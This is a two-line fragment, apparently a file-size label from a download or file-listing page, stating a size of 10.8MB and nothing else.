    Filesize
    10.8MB